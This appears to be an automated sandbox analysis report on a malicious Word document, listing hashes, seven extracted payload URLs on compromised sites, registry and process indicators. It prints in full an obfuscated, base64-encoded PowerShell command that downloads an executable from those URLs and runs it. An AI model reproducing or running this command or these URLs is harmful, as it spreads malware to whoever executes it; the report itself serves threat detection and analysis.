Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 03:43
Behavioral task
behavioral1
Sample
65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118.doc
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118.doc
-
Size
164KB
-
MD5
65e3d81e912145deaf34eefd2537fdc7
-
SHA1
dcedd68b5a21efb1a999fe4ffc35385909528803
-
SHA256
617f019d01c1d776d1c27243f6786c2c0cfa84182b5f0db4599ad12646ce3dfc
-
SHA512
9d18a7716b3cccd5b4e091e553405e6797a76e2530415d333e1c4d1cae7b4a3fe18ac9c89656d4ecadab0f154408faf53090b2fe9cfe93a3c828738c16ca8a95
-
SSDEEP
1536:VAhXAhordi1Ir77zOH98Wj2gpngN+a94ay9y0J6f264NBM:mrfrzOH98ipg4PJ6fQBM
Malware Config
Extracted
http://www.yusukelife.com/wp/ure/
https://www.ingyouth.com/wp-includes/0zCW/
http://alphapharma247.com/wp-content/plugins/r/
http://muanha24h.com/wp-content/fHS7/
http://buyhacks.net/wp-content/jgLqdhk/
https://comsotaque.com/wp-includes/5i/
https://qualitychildcarepreschool.com/emqblk/Ik2D/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2572 2588 powershell.exe -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 6 2572 powershell.exe 7 2572 powershell.exe 9 2572 powershell.exe 12 2572 powershell.exe 14 2572 powershell.exe 15 2572 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\TypeLib\{2A0509DF-1094-4587-86CA-FDA947403634}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{2A0509DF-1094-4587-86CA-FDA947403634}\2.0\0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\TypeLib\{2A0509DF-1094-4587-86CA-FDA947403634}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\TypeLib\{2A0509DF-1094-4587-86CA-FDA947403634}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2220 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2572 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2220 WINWORD.EXE 2220 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEdescription pid process target process PID 2220 wrote to memory of 776 2220 WINWORD.EXE splwow64.exe PID 2220 wrote to memory of 776 2220 WINWORD.EXE splwow64.exe PID 2220 wrote to memory of 776 2220 WINWORD.EXE splwow64.exe PID 2220 wrote to memory of 776 2220 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABXAHUAawBkAGYAaQAzAD0AKAAnAFMAcQAnACsAKAAnAHAAJwArACcAOQBpAHQAJwApACsAJwBzACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAUgBQAHIATwBmAGkAbABFAFwAcABUADEANgBWAGkANgBcAGIAUABNAGkANQBBAHMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBDAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGAAQwBVAHIAYABJAHQAeQBQAFIAbwB0AGAAbwBjAE8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAnACwAIAAnACsAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADEAJwArACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABIAHIAMQB0AHEAdwA5ACAAPQAgACgAJwBYADUAJwArACgAJwB3ADYAegAnACsAJwBsAHMAJwApACkAOwAkAEUAXwB1AF8AdwB4AGQAPQAoACgAJwBaAGMAJwArACcAeQA4ACcAKQArACcAbAA1ACcAKwAnADEAJwApADsAJABLAGEANgB4AHAAMAA3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnADkAVAAnACsAKAAnAHkAJwArACcAUAB0ADEANgAnACsAJwB2ACcAKQArACcAaQAnACsAKAAnADYAJwArACcAOQBUACcAKQArACgAJwB5AEIAcABtAGkANQAnACsAJwBhAHMAJwArACcAOQBUAHkAJwApACkALQBjAFIARQBwAEwAQQBjAEUAIAAoACcAOQAnACsAJwBUAHkAJwApACwAWwBDAGgAYQBSAF0AOQAyACkAKwAkAEgAcgAxAHQAcQB3ADkAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABUADkAZQBlADQAOQB3AD0AKAAoACcAWQAnACsAJwAwAG0AYQAnACkAKwAoACcAcAAnACsAJwB4ADAAJwApACkAOwAkAEIAXwB4AHoAZQBhADYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AdwBFAGIAQwBMAGkAZQBuAHQAOwAkAFMAdgBuAHoAbwAwAGMAPQAoACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAHcAdwAnACkAKwAnAHcALgAnACsAJwB5AHUAJwArACgAJwBzACcAKwAnAHUAawBlAGwAJwApACsAKAAnAGkAJwArACcAZgBlAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAvAHUAJwArACcAcgBlACcAKwAnAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcABzADoAJwArACcALwAnACkAKwAnAC8AJwArACcAdwAnACsAJwB3AHcAJwArACgAJwAuAGkAbgBnACcAKwAnAHkAbwB1ACcAKQArACgAJwB0AGgAJwArACcALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvACcAKwAnADAAegBDAFcALwAnACkAKwAnACoAJwArACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AJwArACcAYQBsACcAKwAoACcAcAAnACsAJwBoAGEAJwApACsAKAAnAHAAJwArACcAaABhAHIAbQBhADIAJwApACsAKAAnADQANwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBjAG8AJwArACcAbgAnACsAKAAnAHQAZQAnACsAJwBuAHQALwBwAGwAJwApACsAJwB1ACcAKwAnAGcAJwArACgAJwBpAG4AJwArACcAcwAvAHIAJwArACcALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdAAnACsAJwBwADoALwAvACcAKQArACgAJwBtAHUAJwArACcAYQAnACkAKwAnAG4AJwArACcAaAAnACsAJwBhACcAKwAoACcAMgA0AGgAJwArACcALgAnACsAJwBjAG8AbQAnACsAJwAvAHcAcAAtAGMAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAoACcAdAAvAGYASAAnACsAJwBTACcAKQArACgAJwA3AC8AJwArACcAKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAOgAnACsAKAAnAC8ALwAnACsAJwBiAHUAJwApACsAJwB5AGgAJwArACgAJwBhAGMAJwArACcAawBzACcAKQArACgAJwAuACcAKwAnAG4AJwArACcAZQB0AC8AdwBwAC0AYwBvAG4AJwArACcAdAAnACsAJwBlACcAKQArACcAbgAnACsAJwB0ACcAKwAnAC8AJwArACgAJwBqACcAKwAnAGcATAAnACkAKwAoACcAcQBkAGgAawAnACsAJwAvACcAKQArACcAKgBoACcAKwAnAHQAdAAnACsAJwBwAHMAJwArACgAJwA6AC8ALwAnACsAJwBjAG8AJwApACsAJwBtAHMAJwArACgAJwBvACcAKwAnAHQAYQBxAHUAZQAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAtAGkAbgAnACsAJwBjAGwAJwApACsAKAAnAHUAZABlACcAKwAnAHMAJwApACsAJwAvADUAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAdABwAHMAJwArACcAOgAnACsAJwAvACcAKQArACcALwBxACcAKwAnAHUAYQAnACsAJwBsACcAKwAoACcAaQAnACsAJwB0AHkAJwApACsAKAAnAGMAJwArACcAaABpAGwAZAAnACkAKwAnAGMAJwArACgAJwBhAHIAJwArACcAZQAnACkAKwAoACcAcAAnACsAJwByAGUAcwAnACkAKwAnAGMAaAAnACsAJwBvACcAKwAnAG8AbAAnACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBlAG0AcQAnACsAJwBiAGwAJwArACcAawAvAEkAJwApACsAKAAnAGsAJwArACcAMgBEAC8AJwApACkALgAiAFMAcABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQgBkADAAZgB5ADMAZgA9ACgAJwBKACcAKwAnAGYAMAAnACsAKAAnAGYANwAnACsAJwB3AGMAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABaADYAegBoAG8AbwBmACAAaQBuACAAJABTAHYAbgB6AG8AMABjACkAewB0AHIAeQB7ACQAQgBfAHgAegBlAGEANgAuACIAZABPAFcAYABOAGAAbABvAGAAQQBkAEYASQBMAEUAIgAoACQAWgA2AHoAaABvAG8AZgAsACAAJABLAGEANgB4AHAAMAA3ACkAOwAkAEMAaQBkADIAZwBuAG8APQAoACgAJwBLAGEAYwAnACsAJwB5ACcAKwAnAGsAYwAnACkAKwAnADYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAEsAYQA2AHgAcAAwADcAKQAuACIAbABgAEUATgBgAEcAVABIACIAIAAtAGcAZQAgADIANgA0ADMANAApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABLAGEANgB4AHAAMAA3ACkAOwAkAEQANgBpADcAdQAxAF8APQAoACcAQgAzACcAKwAoACcAeQAwACcAKwAnAHEAeQBsACcAKQApADsAYgByAGUAYQBrADsAJABIADgAZwB1AGgAbgB6AD0AKAAnAFMAMwAnACsAKAAnAHgAMQBzACcAKwAnADMAJwApACsAJwBrACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBiADIAMwA2AGcAdAA9ACgAKAAnAEMAJwArACcAMABlACcAKQArACcAdwAyACcAKwAnAGoAOQAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD540148062ddb187158af7b559887f9aa0
SHA13fbec9a9f643b6ab37218e44f4b3f0ab8997a928
SHA2567a6e7ba0eda0cb2b7273be8194a08023a0f7f3fb398aa46566081a8f7faa88b4
SHA5124b5b3d7c7f5cd6f5d6604283583bd6ba4863a0f9b76dda76d59d44ae77a846463f661111177756a8d92ec3d341212b96edd74ff3a7f09337e7e58566bfb874f0